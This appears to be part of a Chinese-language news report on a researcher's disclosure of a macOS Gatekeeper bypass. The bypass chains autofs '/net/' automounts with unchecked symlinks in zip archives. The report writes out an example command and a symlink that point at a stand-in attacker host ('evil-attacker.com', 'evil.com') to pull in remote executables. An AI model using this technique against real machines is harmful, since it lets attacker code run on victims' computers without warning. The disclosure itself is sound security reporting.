原创<br> 研究人员称:macOS Gatekeeper安全机制中存在大漏洞( 二 )

安全研究员解释说:

第一个合法的功能是automount(aka autofs),它允许用户仅通过访问“特殊”路径(在这种情况下,以“/ net /”开头的任何路径)自动挂载网络共享。

例如,'ls /net/evil-attacker.com/sharedfolder/'将使os使用NFS读取远程主机(evil-attacker.com)上'sharedfolder'的内容。

第二个合法的功能是zip存档可以包含指向任意位置(包括automount enpoints)的符号链接,并且MacOS上负责解压缩zip文件的软件在创建它们之前不会对符号链接执行任何检查。

这是如何工作的一个例子:

为了更好地理解此漏洞利用的工作原理,让我们考虑以下场景:攻击者制作一个zip文件,其中包含一个指向她/他控制的automount端点的符号链接(来自Documents - > /net/evil.com/Documents)并将其发送到受害者。

受害者下载恶意档案,提取并遵循符号链接。

现在,受害者位于受攻击者控制但受Gatekeeper信任的位置,因此任何攻击者控制的可执行文件都可以在没有任何警告的情况下运行。设计Finder的方式(隐藏.app扩展,隐藏标题栏的完整路径)使得这个技术非常有效且难以发现。

推荐阅读